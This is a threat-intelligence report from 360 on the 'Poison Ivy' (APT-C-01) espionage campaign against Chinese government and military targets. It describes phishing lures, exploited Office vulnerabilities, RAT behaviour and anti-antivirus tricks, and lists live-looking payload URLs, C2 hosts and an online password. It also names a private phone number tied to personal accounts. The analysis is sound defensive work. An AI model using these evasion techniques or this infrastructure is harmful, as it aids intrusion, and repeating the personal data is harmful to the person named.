09月21, 2018

Poison Ivy Group and the Cyberespionage Campaign Against Chinese Military and Goverment

Chapter 1 Overview

1. Main Findings

Through research, 360 Helios Team has found that, since 2007, the Poison Ivy Group has carried out 11 years of cyber espionage campaigns against Chinese key units and departments, such as national defense, government, science and technology, education and maritime agencies. The group mainly targets military industry, Sino-US relations, cross-strait relations and ocean-related fields. It indicates that the group’s interest is similar to that of our previously published OceanLotus APT Group.

360 Helios Team captured the first Trojan of the Poison Ivy Group in December 2007. In the following 11 years, we have captured 13 versions of malicious code, involving 73 samples. In the initial attack, the Group mainly used spear phishing emails. Before the attack, the target was deeply investigated and carefully selected. Contents that are closely related to the target industry or field were used to construct the bait files and emails, such as specific conference materials, researches or announcements. The lure documents contain 10 vulnerable document samples, including a 0day vulnerability. Infections of this Trojan are distributed in 31 provincial-level administrative regions. The number of C&C domain names is 59 located in 4 different countries or regions according to the returned addresses.

In this cyber espionage campaign that lasted for 11 years in China, the following points in time are worthy of attention:

  • In December 2007, the Trojan associated with the group was first discovered. Involving marine related fields (suspected to be related to a large shipping company)
  • In March 2008, a key laboratory (a scientific research institution) of a university in China was attacked
  • In February 2009, attacks against the military industry began (a well-known military journal magazine)
  • In October 2009, the Trojan added a special method of combating static scanning (API string reverse order), and the methods were used in most versions of Trojans and continued to be applied to 2018.
  • In December 2011, the Trojan added a special method to combat dynamic detection (error API parameters), and related methods were used in most versions of Trojans and continued to be applied to 2015.
  • In February 2012, the first modified version of backdoor 1 based on zxshell code was discovered. The key function is to steal document files such as .doc.ppt.xls.wps.
  • In March 2013, intense attacks were constructed targeting Chinese Academy of Sciences and a number of national ministries and commissions in the fields of science and technology, maritime affairs, etc.
  • In October 2013, carried out watering hole attack on a Chinese government website
  • In May 2014, the revolted version 2 of zxshell modified version of Backdoor 1 was discovered. In addition to the function based on the modified version 1, the search for keywords such as "military (军)", "aviation (航)", and "report (报告)" was added.
  • On September 12, 2014, events and samples related to CVE-2014-4114 (0day vulnerability) were first discovered.
  • On October 14, 2014, iSIGHT released the relevant report and disclosed CVE-2014-4114 (0day vulnerability). On the same day, Microsoft released relevant security bulletins.
  • On February 25, 2015, an attack on a military industry association (national defense technology) and the Chinese Academy of Engineering was detected. Kanbox (酷盘) samples were discovered.
  • In October 2017, the CVE-2017-8759 vulnerability document was used to initiate a spear phishing attack on a large media agency website and an individual working in Quanzhou.
  • In April 2018, the 360 Threat Intelligence Center disclosed the attack malicious code of the group, exploring CVE-2017-8759.
  • In May 2018, the actor launched attacks against several maritime organizations such as shipbuilding companies and port operating companies.

Note: The above first attack time is based on the existing statistics we have. It does not mean that we have known all the attacks and behaviors of the organization.

2. About the Codename of the Group

Since 2015, APT researches in China has gradually started and accelerated. Following the exposure of APT organizations such as “OceanLotus” and “LanBao Mushroom”, the Poison Ivy Group (APT-C-01) is another APT organization that launches persistent attacks targeting government, military, and maritime organizations and stealing sensitive information.

This cyberespionages group was independently discovered by 360 and was first disclosed previously with part of the information. The code-naming is in line with 360’s naming standard for APT organizations.

360 Threat Intelligence Center named the APT-C-01 organization "Poison Ivy", mainly considering the following factors: First, the organization used Poison Ivy Trojans in several attacks. Second, the attack organization used the Cloud disk as a springboard to transmit information. This is similar to the feature of vines that can climb across the wall. According to the 360 Threat Intelligence Center's naming rules for APT organizations (see the report: China APT Annual Report 2016). Considering the common vine plants in the associated areas of the Group, APT-C-01 is named "Poison Ivy".

In addition, Antiy Lab revealed the APT organization "Green Spot" on September 19, 2018. According to the mutual recognition agreement between 360 Threat Intelligence Center and Antiy Lab, the “Poison Ivy” (APT-C-01) and “Green Spot” are different names for the same group. Therefore, we have also announced our discovery.  

Chapter 2 Purposes and Victims

1. Purposes

The main purpose of the attacks is to steal data from the Chinese government and scientific research institutions, which are mainly documents. The following keywords and extension are what the actor searched for :

  • Key words:

“201”,“2014”,“2015年”,“报”,“报告”,“兵”,“部队”,“对台”,“工作”,“规划”,“国”,“国际”,“航”,“合作”,“机”,“机场”,“基地”,“极地”,“军”,“军事”,“科技”,“密”,“内部”,“十”,“十三”,“台”,“台湾”,“铁路”,“无人”,“项”,“雪”,“研”,“运输”,“战”,“站”,“中”

  • Extensions:

“doc”,“ppt”,“xls”,“pdf”,“rtf”,“rar”,“wps”,“doc”,“ppt”,“xls*”

  • Related information of the stolen user hosts:

MAC Info: MAC information, including IP address, gateway, etc.

Host Info: Host information, including operating system information, host name, local user name, etc.

Process Info: current process

Version Info: version information, including Microsoft Office and Microsoft Internet Explorer version

Disk Info: Disk Information

alt

Figure 1 User host information (example)

alt

Figure 2 Infected users by month (July 2014 - June 2015)

2. Industrial Distribution

Mainly involved industries: national defense, government, science and technology, education, etc.

Related fields: maritime (South China Sea, East China Sea, mapping), military, Taiwan-related issues (cross-strait relations), Sino-US relations

3. Geographical Distribution

alt

Figure 3 Distribution map of infected areas in China (July 2014-June 2015)

alt

Figure 4 Infected areas in China

alt

Chapter 3 11 Years’ Persistent Campaign

1. Initial Attack

1) Spear Phishing Email

The spear phishing email attack is a common attack method in APT, mainly in the initial phase. Attackers use the mail to start the attack. The text and the attachment may carry malicious code, commonly vulnerability files. About 90% of the attacks are like this.

This section mainly introduces two attack methods: e-mail carrying vulnerability files and e-mail carrying binary executable files.

A. Carrying vulnerable Word document

alt

alt

Figure 5 Carrying vulnerable files Case 1 - Word document

alt

Figure 6 Carrying vulnerable files Case 1 - zipped file

alt

Figure 7 Carrying vulnerable files Case 1 – CHM file

alt

alt

Figure 8 Carrying vulnerable files Case 1 - Email

alt

alt

Figure 9 Carrying vulnerable files Case 2 - Email

alt

Figure 10 Carrying vulnerable files Case 2 – Vulnerable Word Document

B. Carrying PE binary executable

alt

alt

Figure 11 Carrying PE binary executable – email

alt

Figure 12 Carrying PE binary executable – attached zipped file

alt

Figure 13 Carrying PE binary executable – bait document released by the Trojan

The attack actor usually sends a phishing email through the webmail and the related tool (PHPMailer ).

C. Carrying self-extracting file

The attackers send a compressed form of the RAR self-extracting program to the target mailbox.

alt

The Trojan is in the attachment:

alt

The file is actually a RAR self-extracting format program, the parameters are as follows. When victim click on this exe, it will directly run the bat file inside:

alt

The default batch processing command moves the Trojan body to the temp directory, then executes it and deletes the batch processing file:

alt

2) Disguised extensions via RLO

alt

alt

Figure 14 Figure 14 Disguised file extension (RLO)

3) Disguised icons and extensions

alt

alt

Figure 15 Disguised icon and hidden extension Case 1

alt

alt

Figure 16 Disguised icon and hidden extension Case 2

alt

Figure 17 Disguised icon and hidden extension Case 2 – Lure document released by the Trojan

2. Vulnerability Analysis

1) CVE-2012-0158

alt

Reference https://technet.microsoft.com/zh-cn/library/security/ms12-027.aspx http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158

A. Execution flow of the vulnerable file

alt

Figure 18 Execution flow of the vulnerability (CVE-2012-0158)

B. MHT format

alt

Figure 19 Comparison of the two formats of the vulnerable files (upper: MHT, Lower RTF)

CVE-2012-0158 is mainly exploited on the rtf and doc formats. This attack saves the doc file to the mht format, so anti-virus software cannot detect the files due to the pre-logic mismatch. The detection rate on these related vulnerability files was low at the time.

C. Shellcode comparison

alt

Through our comparison of the shellcode of the vulnerable document, we can find that the relevant structure and function are basically the same. Further, we can infer that the related vulnerability document is developed by the same hacker group.

2) CVE-2014-6352 (0day)

A. Background

The CVE-2014-4114 vulnerability is a report released by iSIGHT on October 14, 2014. The report mentions a 0day vulnerability (CVE-2014-4114) exploited in cyber espionage mainly against NATO, EU, telecommunications and energy related fields. Microsoft also released the relevant security bulletin on October 14.

CVE-2014-6352 is a vulnerability that can bypass the CVE-2014-4114 patch. Microsoft's previous patching scheme first adds the MakeFileUnsafe call after generating the Inf and exe files to set the file zone information, so there will be security alert when the exploitation install inf. The CVE-2014-6352 vulnerability sample abandoned the use of inf to install exe, rather than directly executing exe. Because the second item of the right-click menu of the system executable file above xp is executed with administrator privileges, this will result in no security reminder if the user closes the uac. So the Microsoft 6352 patch is to add a security prompt popup window in the context menu.

alt

Refenrece https://technet.microsoft.com/zh-cn/library/security/ms14-060.aspx https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4114

alt

Reference https://technet.microsoft.com/zh-cn/library/security/3010060.aspx https://technet.microsoft.com/zh-cn/library/security/ms14-064.aspx http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6352

B. Related introductions in this operation

alt

alt

Figure 20 Vulnerability Document (CVE-2014-6352) attribution related information

alt

Figure 21 CVE-2014-6352 related key time points

The sample in this action does not use inf as the springboard, but directly use exe. After the CVE-2014-4114 vulnerability is triggered, the default is to call the second item of the right-click menu. Under Windows7, it is normally opened with administrator privileges. If the second option is another option, it will pass the virus path as a parameter, which will also cause partial compatibility issues. The execution effect is as shown in the following figure:

alt

Figure 22 Schematic diagram of the vulnerability implementation

Upgrade of the vulnerability document version

alt

Figure 23 Sandworm vulnerability document sample (version A)

alt

Figure 24 Sandworm vulnerability documentation sample (version B)

alt

Figure 25 Poison Ivy vulnerable document sample (version C)

alt

3) CVE-2017-8759

A. Background

CVE-2017-8759 is a 0day vulnerability disclosed by FireEye on September 12, 2017. Microsoft released a related security bulletin on September 12.

alt

Reference link https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8759

B. Related information in the action

alt

The Rtf file automatically update the link through the objautlink and objupdate. After the vulnerability is triggered, mshta.exe executes the remotely HTA file.

alt

The HTA file is an html page embedded with a malicious VBS, and the VBS calls POWERSHELL to download the subsequent exe loader.

alt

3. Persistent penetration

1) RAT Evolution

RAT: Remote Access Trojan

alt

Figure 26 Related RAT evolution timeline

alt

A total of 11 versions were involved with the relevant backdoors. The relevant proportions are as follows:

alt

Figure 27 The relevant proportion ratio of these 11 versions of RAT

alt

2) Analysis to these 13 versions of RAT

alt

Figure 28 RAT related version classification

A. Poison Ivy

The Poison Ivy Trojan is essentially a Remote Access Trojan (RAT). FireEye had conducted a special analysis on Poison Ivy. The Poison Ivy Trojan in this report corresponds to the 2.3.2 version. The Poison Ivy Trojan Generator has a total of 10 versions starting from version 1.0.0. The latest version is 2.3.2. The Poison Ivy Trojan Generator can generate both versions including EXE and shellcode. The Trojans generated in this case are in shellcode form. Most of the related Mutexes are mostly default as: ")! VoqA.I4".

alt

Figure 29 Configuration Interface Screenshot to Poison Ivy generator

alt

Figure 30 PI Relationship between Outer Layer and Inner Layer

The Poison Ivy Trojan gets the shellcode from the out layer parent by XOR key1 and key2 in turn.

alt

Figure 31 Poison Ivy Trojan (three) related XOR decryption comparison

There is a list of related Poison Ivy Trojan configuration information (ID and corresponding password).

alt

B. ZxShell

ZxShell has been used continuously by APT-C-01 organization from December 2007 until October 2014. Due to the large difference between the relevant versions, ZxShell can be regarded as two versions. They are the internal published version and the open source version. The first version refers to the ZxShell Trojan used by the APT-C-01 organization from 2007 to 2012. The second version refers to the relevant ZxShell Trojan used by the organization from 2012 to 2014. The related Trojan is developed based on the open source version, which we call it secondary development version. The internal published version and the open source version are both 3.0 version. The former is not widely publicized, but intergraded with features. The latter version’s related source code is widely distributed, and the functions are eliminated from the previous versions. For more detailed analysis about ZxShell, please refer to the report: Threat Spotlight: Group 72, Opening the ZxShell from Cisco.

alt

It can be seen from the above table that the number of instructions to the corresponding version is continuously reduced based on research to the relevant version of the Trojan. That means the Poison Ivy Group had eliminated more existing features. Only 13 instructions are retained in the secondary development version, yet further additional instructions and features have been added. The related new features in the secondary development version are shown in the following table:

Secondary Development Version V.S. Open Source Version

alt

The samples we captured are based on ZxShell source code modifications. They have retained the original structure. ZxShell itself has more than twenty instructions. In addition to retaining some instructions, the samples we captured excluded a large number of instructions, such as: installation start, clone system account, shutdown firewall, port scan, proxy server and other functions and also with the "IEPass" command added.

alt

Figure 32 Screenshots to IEPass Directive related Code

Related subversion iteration update (secondary development version)

  1. Compared with the previous version, the change is mainly the part of collecting information. And the time range for collecting documents is expanded from half a year to 4 years ago, the file extension of the ".wps" is added, and the original ".doc" has been changed into ".doc*";
  2. The time range for stealing documents has been changed to half year ago. Modify the file packing part to remove the file version information.
  3. Modify the monitoring log file encryption to write to the log adovbs.mof; add monitor to configuration characters; add Profiles.log to record system information and file information.
  4. The code function is less updated than the previous version, and the position of the related function has changed to fight with the anti-virus software.

alt

Figure 33 Screenshot to relevant keyword code

ZxShell related configuration list

alt

C. Kanbox version

The related sample camouflage itself as folder icon. After execution, it will release the "svch0st.exe" Trojan file and the normal folder and ".doc" document file to confuse the user.

"svch0st.exe" is a Trojan transmitted by ssl encryption protocol. It will execute all the Trojan processes every hour, and the Trojan process will pack and upload all the information on the computer (related information includes: file directory, system Version, network card information, process list information, package specified files, network information, and disk information), and the files with related keywords (such as: "Taiwan", "Army", "War" in Chinese), to the Kanbox that the attacker registered in advance by ssl protocol.

C&C address is a Kanbox address . File will be uploaded via the API provided by Kanbox.

API upload interface: https://api-upload.kanbox.com/0/upload/%s/%s?bearer_token=%s https://auth.kanbox.com/0/token

alt

Figure 34 Screenshot to the Kanbox API address code

alt

Figure 35 Screenshot to the official website home page of Kanbox

alt

Kanbox version related configuration information list

alt

D. Unknown RAT

The unknown RAT is divided into two versions from the outer dropper. They are the folder version and the bundle version. The RAT is divided into four versions, and they are all unknown remote access Trojan.

a) Folder Version

alt

Figure 36 Related changes after the implementation of the unknown RAT file version

b) Bundle version

67d5f04fb0e00addc4085457f40900a2
└─Atnewyrr.exe~tmp.zip
│  newyrr.exe
│
└─doll.exe
            aaa.vbs
            b.bat
            server.exe

alt

Figure 37 Digital signature used in unknown RAT

E. Other

The backdoor program used by the APT-C-01 organization in related actions further includes three RATs. They are: gh0st, XRAT and HttpBot.

3) Payload analysis of script loading

At the beginning of 2018, 360 Threat Intelligence Center discovered a control domain (http://updateinfo.servegame.org) used by the APT-C-01 organization to control and distribute the attack payload. In the attack activity, the organization referred to the CVE-2017-8759 vulnerability document, downloaded the malicious HTA file, and executed related script commands to download and execute the subsequent attack payload module.

alt

alt

A. Dropper Analysis

Dropper program was triggered to be download and executed by the vulnerability document attached to the spear phishing email.

alt

And it will download the malicious HTA file, which executes the PowerShell command to download the Loader program and saves it as officeupdate.exe and then executes it.

alt

B. Loader Analysis

According to the string information contained in the Loader program, the creator named it as SCLoaderByWeb, and the version is 1.0, which literally means the Shellcode Loader program obtained from the Web. It is used to download and execute shellcode code.

alt

The Loader program will firstly try to connect to a common URL to check network connectivity. If there is no networking, it will try to connect every 5 seconds until the network can be connected. Then it downloads the payload from hxxp://updateinfo.servegame.org/tiny1detvghrt.tmp, as shown in the figure:

alt

Then judge whether the file is successfully downloaded. If not, it will sleep for 1 second, then try to download the payload again:

alt

After the download, the content of the downloaded file is XOR decrypted by each byte and 0xac, 0x5c, 0xdd (essentially, each byte is exclusive or 0x2d), as shown in the figure:

alt

After that, the decrypted shellcode is executed in the newly created thread, as shown in the figure:

alt

alt

C. Shellcode Analysis

The .tmp files hosted by the distribution domain name address are bytecode XORed shellcode. The following figure shows the tinyq1detvghrt.tmp file downloaded from the distribution domain name, which is XOR2d encrypted data.

alt

After decryption, it is found that the shellcode generated by Poison Ivy as follows:

alt

By analyzing and testing the shellcode format generated by the Poison Ivy Trojan and comparing the shellcode format used in the attack payload, the position and meaning of each configuration field in the shellcode is obtained.

alt

alt

alt

The format of its shellcode configuration field is as follows:

alt

When the code logic of the kernel32 base address in Poison Ivy was analyzed, it is found to be incompatible with the Windows 7 system, because the second module of the InitializationOrderModule under Windows 7 OS is KernelBase.dll, so the actual acquisition is the base address of KernelBase.

alt

alt

Since Poison Ivy has stopped updating, the attack organization has made a code patch to improve the code for obtaining the base address of kernel32 in order to enable shellcode to be executed on subsequent versions of Windows.

The improvement method is as follows:

  1. Add a jump instruction to the end of the shellcode before the original kernel32 base code is obtained, and the patch code is added at the end;
  2. The patch code first obtains the base address of the second module of the InitializationOrderModule (kernel32.dll under Windows XP, kernelbase.dll for Windows 7);
  3. Then get the address of LoadLibraryExA of the second module of InitializationOrderModule (kernel32.dll under Windows XP and kernelbase.dll under Windows 7 have this export function)
  4. Finally, get the base address of kernel32 by calling LoadLibraryExA function.

alt

The attacker's patch for shellcode makes it available for different versions of Windows systems.

The function of this shellcode is mainly the remote access Trojan’s control module, and C2 communication and remote control. Here we simulate the on-line process of the Trojan under the Windows 7 system.

alt

Decrypt the other shellcode files managed on the control domain name, and the online information of the obtained samples is listed as follows:

alt

4) Latest analysis of RAT

In May 2018, we discovered a new Trojan program used by the APT-C-01 Group in its attacks against relevant maritime agencies and units in China. It mainly used the spear phishing email to deliver RAR self-extracting program attachment. When the victim double-clicked the attachment, the Trojan run and executes itself.

At the entrance of the remote control module, malicious code is executed in the catch by triggering the exception code, as shown in the figure:

alt

Then use the same method to trigger the exception code and enter the second layer of code:

alt

Enter the initialization socket and establish a connection with C2:

alt

Connect to port 8080 of zxcv201789.dynssl.com to create a C&C channel:

alt

The place where the online package is sent to the control server has an online password: asd88, as shown in the figure:

alt

Finally enter the functional loop part of the remote control:

alt

as follows:

alt

Function included: Token Function

  • 0x04 Close the connection
  • 0x41 Remote shell
  • 0x42 Process enumeration
  • 0x43 End the specified process
  • 0x51 Enumerate drive
  • 0x52 List specified directory
  • 0x53 Upload files to the victim
  • 0x54 Download file from victim
  • 0x55 Delete Files
  • 0x56 Remote execution

The strings in this Trojan are inverted strings, which are reversed by the C language strrev. This method was also used in the Trojan from this organization in 2015. Figure is as follow:

4. C&C analysis

1) Dynamic domain

alt

Figure 38 DynDNS Hosting Providers(ChangeIP)

alt

Figure 39 DynDNS Hosting Providers ratio graph

alt

2) The meaning of the domain name

The following are the dynamic subdomain names (registered by the attack organization),and we listed them here for research and analysis of the relevant mapping meanings.

alt

alt

3) Cloud drive

The current two tokens of Kanbox sample:

alt

Through the analysis of the kanbox API, we get the information of the Cloud disk account used by the Group, mainly including the mobile phone number of China Mobile, which is used to register the Cloud disk account.

{"status":"ok","email":"","phone":"15811848796","spaceQuota":1700807049216,"spaceUsed":508800279,"emailIsActive":0,"phoneIsActive":1}

Some of the correlation analysis results we conducted with this mobile phone number:

alt

Figure 40 Google search results

alt

Figure 41 Weifengtang website user information 1

alt

Figure 42 Weifengtang website user information 2

alt

Figure 43 Alipay and WeChat information of the number owner

4) Third party blog service

alt

Figure 44 Screenshot of the blog part

The picture above shows the Poison Ivy Group relying on a third-party blog for malicious code transmission. The domain name of a blog is usually in the whitelist of firewalls and various security software. Using this method to store malicious code in a blog can avoid anti-virus software.

5) C&C IP(ASN)

alt

Figure 45 C&C IP Correlation Analysis

6) Other

The domain name gaewaaa.upgrinfo.com has relevant whois information, as shown below.

alt

Figure 46 Domain registration information Another domain name is moneyaaa.beijingdasihei.com

5. Correlation Analysis

1) Overall Correlation

Correlate between raw attack emails, vulnerability files, 3 different RATs (ZxShell, Poison Ivy and Kanbox version), and related domain names, online passwords, file extensions, compressed package passwords, and keyword different resources.

alt

Figure 47 Figure 47 Overall relationship between different resources

2) RAT iterative upgrade (Countermeasures)

alt  

Typical method of the correlated samples:

A. Development environment

Except XRAT backdoor, all other versions have used the C++ from 2008 to 2015.

B. Encryption

The following versions: 2011 version, memcache version, Voice64 version, HTTPBOTS version, kanbox version, PI, XRAT all use XOR decryption for two times, and then execute malicious code. In addition, the cloud drive version will also encrypt the file.

alt

Figure 48 unknown RAT2011 (left), Kanbox (right)

C. Stealing function

ZXShell backdoor uses a custom stealing function that is very similar to the stealing function used by 2015 cloud drive version. The search of the A drive(usually the floppy disk driver) is excluded, the disk is traversed in advanced, the driver list is stored in the memory, and the drive list in the memory is ready by the pointer plus 5.

alt

Figure 49 ZxShell (left), Kanbox(right)

D. Shellcode backdoor

Compared to the 2011 version (Poison Ivy) injected into the system’s Shellcode and 2015 cloud drive version, the highly similarity Shellcode backdoor and the last line address is also filled with 0x30.

alt

Figure 50 unknown RAT2011 version (left), Kanbox (right)

Related shellcode Trojan file detection result ( 0 detection): https://www.virustotal.com/en/file/8cee670d7419d1fd0f8f0ac6a2bd981593c2c96ca0f6b8019317cf556337cfa8/analysis/

E. Child file name (outer layer)

By comparing the 2009 version with the 2011 version, it can be seen that the name of the child files released by the virus is ~work.tmp, the format string is “%s\%s.bak”, and the code similarity is extremely high. Use ~tmp.tmp、~tmp.zip、~mstmp.cpt as the temporary file name of the Trojan (07~09).

alt

Figure 51 unknown RAT2009 (left), unknown RAT2011(right)

F. Bypass Anti-Virus –API string reverse order against static scan

HttpBot, Kanbox, XRAT, RAT(07-11version) Trojan, reverse order API string is used in code writing. When the Trojan executes, the reverse string is converted to a normal API string by the _strrev function, and the GetProcAddress function is called to dynamically obtain the API address. Reverse order API string increases the difficulty of string detection. In addition, the API address is obtained in the Trojan dynamic execution, which is difficult to detect in the static information of the PE, which increases the difficulty of API detection. The Poison Ivy is known to use this since 2009 and continue to use until 2018.

alt

Figure 52 Unknown RAT2009 (upper), kanbox(below)

G. Bypass Anti-Virus– pass error API parameters against dynamic scan:

Kanbox, Poison Ivy, XRAT, ZxShell, unknown RAT(07-11 version) trojan, used GetClientRect function to against dynamic scanning of anti-virus software. GetClientRect prototype is: BOOL GetClientRect(HWND hWnd,LPRECT lpRect); the role is toget the windows coordinate area. The first parameter is the target window handle. The second parameter is the returned coordinate structure. The Trojan called GetClientRect, passing 0 in the first parameter on purpose. This makes the GetClientRect function fail forever in the normal Windows operation system, and return value is 0. At present, many anti-virus software uses dynamic scanning technology(mostly in heuristic detection). The simulation of executing the GetClientRect function does not consider error parameters, so that the GetClientRect function is always executed successfully by simulation, and the return value is non-zero. In this way, the anti-virus software virtual environment and the user's real system can be distinguished by Trojans, thus by pass anti-virus software detection. The Kaspersky Virtual Machine heuristic scanning environment can be detected by Trojans. The Poison Ivy is known to use this since 2011 and continue to use until 2018.

alt

Figure 53 unknown RAT2011(upper left),zxshell(Upper right),Kanbox (under) The Kanbox uses the dynamic acquisition API to call GetClientRect function.

H. Legal digital signature

Versions before 2011

alt

2015 BLOG version Started to use the signature in May 2015 (suspected of being stolen) Signature:We Build Toolbars LLC

Chapter 4 The Group Behind the Curtain

1. Resource information of files and PE files.

  1. Vulnerability Files:
  2. a. Normal released DOC:Traditional Chinese or specific area’s font, etc.
  3. b. Some patch, such as DANK in PPSX
  4. PE:String in traditional Chinese or font used in a specific area (BIG5), such as PE file version information and string in ID\password\mutex.
  5. CC:
  6. a. Non-Dynamic Domain: Wade-Giles romanization, Registration Inforamtion
  7. b. Dynamic Domain:
  8. c. Cloud Storage
  9. IP:specific area and the United States, main in CC and mail.
  10. Related time zone:PE time stamp、file create time, etc, information such as Monday morning attack.

2. Related information

1) Domain whois information

The domain is javainfo.upgrinfo.com. The address in the registration information is a specific area, and the spell of the name is Wade-Giles Romanization.

alt

2) Keywords

alt

Figure 54 Codes contains related keyword

Keyword: “对台”,“台”,“台湾”

Vulnerability file or Trojan’s original file name (lure file name) lists:

  • 2012年度涉台法学研究课题材料.doc

  • 2012年度涉台周边问题研究课题材料.doc

  • 2013年度涉台周边问题研究课题材料.doc

  • 关于海峡两岸关系法学研究会2012年年会暨会员大会的通报.doc

  • 关于两岸关系研究学术座谈会的背景材料.doc

  • 海峡两岸关系研究会2013年度涉台周边问题研究征集选题.zip

  • 海峡论坛深层次推动两岸关系.exe

  • 两岸军事互信研究学术研讨会议邀请信.doc

  • 台盟中央参政议政工作通讯2013年第2期.doc

3) Traditional fonts and BIG5 character set in the PE files

The help information in the Zxshell is garbled. Actually it is traditional Chinese.

alt

Figure 55 ZxShell related screenshot

alt

Figure 56 unknown RAT2009

4) Traditional Chinese fonts in the vulnerability document

alt

Figure 57 vulnerability file(CVE-2014-4114)property details screenshot

alt

Figure 58 vulnerability file(CVE-2014-4114)slide file screenshot

5) Released phishing document

Default font for the specific region:PMingLiU

alt

Figure 59 backdoor released phishing file

alt

Figure 60 Xinhua related news’ screenshot

http://news.xinhuanet.com/world/2014-05/18/c_1110741502.htm

Chapter 5 Group Summary

alt

Appendix 1: MD5

03d762794a6fe96458d8228bb7561629
0595f5005f237967dcfda517b26497d6
07561810d818905851ce6ab2c1152871
0e80fca91103fe46766dcb0763c6f6af
1374e999e1cda9e406c19dfe99830ffc
1396cafb08ca09fac5d4bd2f12c65059
1ab54f5f0b847a1aaaf00237d3a9f0ba
1aca8cd40d9b84cab225d333b09f9ba5
1dc61f30feeb60995174692e8d864312
250c9ec3e77d1c6d999ce782c69fc21b
2579b715ea1b76a1979c415b139fdee7
26d7f7aa3135e99581119f40986a8ac3
27f683baed7b02927a591cdc0c850743
28e4545e9944eb53897ee9acf67b1969
2a96042e605146ead06b2ee4835baec3
2c405d608b600655196a4aa13bdb3790
30866adc2976704bca0f051b5474a1ee
31c81459c10d3f001d2ccef830239c16
3484302809ac3df6ceec857cb4f75fb1
36c23c569205d6586984a2f6f8c3a39e
382132e601d7a4ae39a4e7d89457597f
3e12538b6eaf19ca163a47ea599cfa9b
41c7e09170037fafe95bb691df021a20
45e983ae2fca8dacfdebe1b1277102c9
4e57987d0897878eb2241f9d52303713
5696bbee662d75f9be0e8a9ed8672755
5e4c2fbcd0308a0b9af92bf87383604f
5ee2958b130f9cda8f5f3fc1dc5249cf
5f1a1ff9f272539904e25d300f2bfbcc
611cefaee48c5f096fb644073247621c
67d5f04fb0e00addc4085457f40900a2
6a37ce66d3003ebf04d249ab049acb22
6ca3a598492152eb08e36819ee56ab83
7639ed0f0c0f5ac48ec9a548a82e2f50
76782ecf9684595dbf86e5e37ba95cc8
785b24a55dd41c94060efe8b39dc6d4c
7c498b7ad4c12c38b1f4eb12044a9def
81232f4c5c7810939b3486fa78d666c2
81e1332d15b29e8a19d0e97459d0a1de
8abb22771fd3ca34d6def30ba5c5081c
95f0b0e942081b4952e6daef2e373967
9b925250786571058dae5a7cbea71d28
9bcb41da619c289fcfdf3131bbf2be21
9f9a24b063018613f7f290cc057b8c40
a73d3f749e42e2b614f89c4b3ce97fe1
a807486cfe05b30a43c109fdb6a95993
a8417d19c5e5183d45a38a2abf48e43e
acc598bf20fada204b5cfd4c3344f98a
accb53eb0faebfca9f190815d143e04b
adc3a4dfbdfe7640153ed0ea1c3cf125
ae004a5d4f1829594d830956c55d6ae4
b0be3c5fe298fb2b894394e808d5ffaf
b244cced7c7f728bcc4d363f8260090d
b301cd0e42803b0373438e9d4ca01421
bd2272535c655aff1f1566b24a70ee97
bd4b579f889bbe681b9d3ab11768ca07
bfb9d13daf5a4232e5e45875e7e905d7
c31549489bf0478ab4c367c563916ada
c8755d732be4dc13eecd8e4c49cfab94
c8fd2748a82e336f934963a79313aaa1
ca663597299b1cecaf57c14c6579b23b
d12099237026ae7475c24b3dfb5d18bc
d61c583eba31f2670ae688af070c87fc
dde2c03d6168089affdca3b5ec41f661
e2e2cd911e099b005e0b2a80a34cfaac
e9a9c0485ee3e32e7db79247fee8bba6
ec7e11cfca01af40f4d96cbbacb41fed
eff88ecf0c3e719f584371e9150061d2
f0c29f89ffdb0f3f03e663ef415b9e4e
f1b6ed2624583c913392dcd7e3ea6ae1
f27a9cd7df897cf8d2e540b6530dceb3
f29abd84d6cdec8bb5ce8d51e85ddafc
f3ed0632cadd2d6beffb9d33db4188ed
fbd0f2c62b14b576f087e92f60e7d132
fccb13c00df25d074a78f1eeeb04a0e7
0fb92524625fffda3425d08c94c014a1
168365197031ffcdbe65ab13d71b64ec
2b5ddabf1c6fd8670137cade8b60a034
517c81b6d05bf285d095e0fd91cb6f03
7deeb1b3cce6528add4f9489ce1ec5d6
aa57085e5544d923f576e9f86adf9dc0
cda1961d63aaee991ff97845705e08b8
e07ca9f773bd772a41a6698c6fd6e551
fb427874a13f6ea5e0fd1a0aec6a095c

Appendix 2: C&C

126mailserver.serveftp.com
access.webplurk.com
aliago.dyndns.dk
as1688.webhop.org
babana.wikaba.com
backaaa.beijingdasihei.com
bt0116.servebbs.net
ceepitbj.servepics.com
check.blogdns.com
china.serveblog.net
chinamil.lflink.com
cluster.safe360.dns05.com
cnwww.m-music.net
fff.dynamic-dns.net
gaewaa.upgrinfo.com
givemea.ygto.com
givemeaaa.upgrinfo.com
goldlion.mefound.com
gugupd.008.net
guliu2008.9966.org
hyssjc.securitytactics.com
jason.zyns.com
javainfo.upgrinfo.com
jerry.jkub.com
kav2011.mooo.com
kouwel.zapto.org
laizaow.mefound.com
localhosts.ddns.us
mail.sends.sendsmtp.com
mail163.mypop3.net
mailsends.sendsmtp.com
mediatvset.no-ip.org
moneyaaa.beijingdasihei.com
motices.ourhobby.com
mp3.dnset.com
netlink.vizvaz.com
operater.solaris.nu
pps.longmusic.com
ps1688.webhop.org
rising.linkpc.net
safe360.dns05.com
sandy.ourhobby.com
soagov.sytes.net
soagov.zapto.org
soasoa.sytes.net
ssy.ikwb.com
ssy.mynumber.org
svcsrset.ezua.com
teacat.https443.org
tong.wikaba.com
updates.lflink.com
usa08.serveftp.net
waterfall.mynumber.org
webupdate.dnsrd.com
www.safe360.dns05.com
www.ssy.ikwb.com
www.tong.wikaba.com
wwwdo.tyur.acmetoy.com
xinhua.redirectme.net
131.213.66.10
146.0.32.168
165.227.220.223
188.166.67.36
199.101.133.169 
45.32.8.137
45.76.125.176
45.76.228.61
45.76.9.206
45.77.171.209
bearingonly.rebatesrule.net
canberk.gecekodu.com
emailser163.serveusers.com
fevupdate.ocry.com
geiwoaaa.qpoe.com
hy-zhqopin.mynumber.org
l63service.serveuser.com
microsoftword.serveuser.com
office.go.dyndns.org
updateinfo.servegame.org
uswebmail163.sendsmtp.com
winsysupdate.dynamic-dns.net
wmiaprp.ezua.com
www.service.justdied.com
zxcv201789.dynssl.com
officepatch.dnset.com
pouhui.diskstation.org
comehigh.mefound.com
annie165.zyns.com
http://annie165.zyns.com/zxcvb.hta

本文链接:http://blogs.360.cn/post/APT_C_01_en.html

-- EOF --

Comments